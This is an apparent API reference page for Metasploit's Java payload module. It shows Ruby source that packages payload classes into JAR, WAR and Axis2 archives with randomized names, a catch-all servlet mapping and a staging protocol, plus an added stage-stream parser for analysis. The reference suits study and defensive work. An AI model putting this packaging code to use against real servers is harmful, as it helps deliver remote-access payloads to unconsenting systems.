Module: Msf::Payload::Java
- Included in:
- BindTcp, MeterpreterLoader, ReverseHttp, ReverseTcp
- Defined in:
- lib/msf/core/payload/java.rb
Defined Under Namespace
Modules: BindTcp, MeterpreterLoader, PayloadOptions, ReverseHttp, ReverseHttps, ReverseTcp
Instance Method Summary
- #class_files ⇒ Object
  Default to no extra class files.
- #generate(opts = {}) ⇒ Object
  Used by stagers to construct the payload jar file as a String.
- #generate_axis2(opts = {}) ⇒ Rex::Zip::Jar
  Used by stagers to create an Axis2 web service file as a Rex::Zip::Jar.
- #generate_default_stage(opts = {}) ⇒ Object
- #generate_jar(opts = {}) ⇒ Rex::Zip::Jar
  Used by stagers to create a jar file as a Rex::Zip::Jar.
- #generate_stage(opts = {}) ⇒ Object
  Used by stages; all java stages need to define stage_class_files as an array of .class files located in data/java/.
- #generate_war(opts = {}) ⇒ Object
  Like #generate_jar, this method is used by stagers to create a war file as a Rex::Zip::Jar object.
- #stage_class_files ⇒ Object
  Default to no extra stage class files.
Instance Method Details
#class_files ⇒ Object
Default to no extra class files
    # File 'lib/msf/core/payload/java.rb', line 149
    def class_files
      []
    end
#generate(opts = {}) ⇒ Object
Used by stagers to construct the payload jar file as a String
    # File 'lib/msf/core/payload/java.rb', line 34
    def generate(opts={})
      generate_jar(opts).pack
    end
#generate_axis2(opts = {}) ⇒ Rex::Zip::Jar
Used by stagers to create an Axis2 web service file as a Rex::Zip::Jar. Stagers define a list of class files returned via class_files. The configuration file is created by the payload’s #stager_config method.
    # File 'lib/msf/core/payload/java.rb', line 119
    def generate_axis2(opts={})
      raise if not respond_to? :stager_config

      app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

      services_xml = %Q{<service name="#{app_name}" scope="application">
    <description>#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}</description>
    <parameter name="ServiceClass">metasploit.PayloadServlet</parameter>
    <operation name="run">
    <messageReceiver mep="http://www.w3.org/2004/08/wsdl/in-out" class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
    </operation>
    </service>
    }

      paths = [
        [ 'metasploit', 'Payload.class' ],
        [ 'metasploit', 'PayloadServlet.class' ]
      ] + class_files

      zip = Rex::Zip::Jar.new
      zip.add_file('META-INF/', '')
      zip.add_file('META-INF/services.xml', services_xml)
      zip.add_files(paths, MetasploitPayloads.path('java'))
      zip.add_file('metasploit.dat', stager_config(opts))
      zip.build_manifest(:app_name => app_name)

      zip
    end
#generate_default_stage(opts = {}) ⇒ Object
    # File 'lib/msf/core/payload/java.rb', line 20
    def generate_default_stage(opts={})
      stage = ''
      stage_class_files.each do |path|
        data = MetasploitPayloads.read('java', path)
        stage << [data.length, data].pack('NA*')
      end
      stage << [0].pack('N')

      stage
    end
#generate_jar(opts = {}) ⇒ Rex::Zip::Jar
Used by stagers to create a jar file as a Rex::Zip::Jar. Stagers define a list of class files from the class_files method. The configuration file is created by the payload’s #stager_config method.
    # File 'lib/msf/core/payload/java.rb', line 48
    def generate_jar(opts={})
      raise if not respond_to? :stager_config
      # Allow changing the jar's Main Class in the manifest so wrappers
      # around metasploit.Payload will work.
      main_class = opts[:main_class] || "metasploit.Payload"

      paths = [
        [ "metasploit", "Payload.class" ],
      ] + class_files

      jar = Rex::Zip::Jar.new
      jar.add_sub("metasploit") if opts[:random]
      jar.add_file("metasploit.dat", stager_config(opts))
      jar.add_files(paths, MetasploitPayloads.path('java'))
      jar.build_manifest(:main_class => main_class)

      jar
    end
#generate_stage(opts = {}) ⇒ Object
Used by stages; all java stages need to define stage_class_files as an array of .class files located in data/java/.
The staging protocol expects any number of class files, each prepended with its length, and terminated with a 0:
    [ 32-bit big endian length ][ first raw .class file ]
    ...
    [ 32-bit big endian length ][ Nth raw .class file ]
    [ 32-bit null ]
    # File 'lib/msf/core/payload/java.rb', line 16
    def generate_stage(opts={})
      generate_default_stage(opts)
    end
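For analysis of a captured stage stream, the length-prefixed framing described above can be split back into its individual blobs and each one hashed for triage. The following Ruby is an added example, not part of lib/msf/core/payload/java.rb; parse_java_stage, StageParseError, the size cap and the sample blobs are assumptions constructed for illustration.

```ruby
require 'digest'

JAVA_CLASS_MAGIC = "\xCA\xFE\xBA\xBE".b  # first four bytes of every .class file
MAX_CLASS_SIZE   = 16 * 1024 * 1024      # assumed sanity cap, not from the page

class StageParseError < StandardError; end

# Split a stage stream into its blobs: repeated
# [ 32-bit big endian length ][ raw bytes ], ended by a 32-bit zero.
def parse_java_stage(stream, max_size: MAX_CLASS_SIZE)
  buf = stream.b
  offset = 0
  classes = []
  loop do
    raise StageParseError, "truncated length field at offset #{offset}" if buf.bytesize - offset < 4
    len = buf.byteslice(offset, 4).unpack1('N')
    offset += 4
    break if len.zero?                    # terminator reached
    raise StageParseError, "length #{len} exceeds cap" if len > max_size
    raise StageParseError, "body truncated at offset #{offset}" if buf.bytesize - offset < len
    body = buf.byteslice(offset, len)
    classes << {
      offset: offset,
      length: len,
      java_class: body.start_with?(JAVA_CLASS_MAGIC),
      sha256: Digest::SHA256.hexdigest(body)
    }
    offset += len
  end
  # Bytes after the terminator are not part of the format; report them.
  { classes: classes, trailing_bytes: buf.bytesize - offset }
end

# Constructed sample: two placeholder blobs carrying only the class-file magic,
# framed with the same pack('NA*') layout that generate_default_stage uses.
def constructed_stage
  blobs = [JAVA_CLASS_MAGIC + 'first'.b, JAVA_CLASS_MAGIC + 'second'.b]
  blobs.map { |d| [d.bytesize, d].pack('NA*') }.join + [0].pack('N')
end

if __FILE__ == $PROGRAM_NAME
  parse_java_stage(constructed_stage)[:classes].each do |c|
    puts format('offset=%d length=%d class=%s sha256=%s', c[:offset], c[:length], c[:java_class], c[:sha256])
  end
end
```

A blob whose java_class flag is false, or a non-zero trailing_bytes count, means the stream does not match the format documented here and should be examined by hand.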
#generate_war(opts = {}) ⇒ Object
Like #generate_jar, this method is used by stagers to create a war file as a Rex::Zip::Jar object.
    # File 'lib/msf/core/payload/java.rb', line 75
    def generate_war(opts={})
      raise if not respond_to? :stager_config
      zip = Rex::Zip::Jar.new

      web_xml = %q{<?xml version="1.0"?>
    <!DOCTYPE web-app PUBLIC
    "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN"
    "http://java.sun.com/dtd/web-app_2_3.dtd">
    <web-app>
    <servlet>
    <servlet-name>NAME</servlet-name>
    <servlet-class>metasploit.PayloadServlet</servlet-class>
    </servlet>
    <servlet-mapping>
    <servlet-name>NAME</servlet-name>
    <url-pattern>/*</url-pattern>
    </servlet-mapping>
    </web-app>
    }
      app_name = opts[:app_name] || Rex::Text.rand_text_alpha_lower(rand(8)+8)

      web_xml.gsub!(/NAME/, app_name)

      paths = [
        [ "metasploit", "Payload.class" ],
        [ "metasploit", "PayloadServlet.class" ],
      ] + class_files

      zip.add_file('WEB-INF/', '')
      zip.add_file('WEB-INF/web.xml', web_xml)
      zip.add_file("WEB-INF/classes/", "")
      zip.add_files(paths, MetasploitPayloads.path('java'), 'WEB-INF/classes/')
      zip.add_file("WEB-INF/classes/metasploit.dat", stager_config(opts))

      zip
    end
#stage_class_files ⇒ Object
Default to no extra stage class files
    # File 'lib/msf/core/payload/java.rb', line 154
    def stage_class_files
      []
    end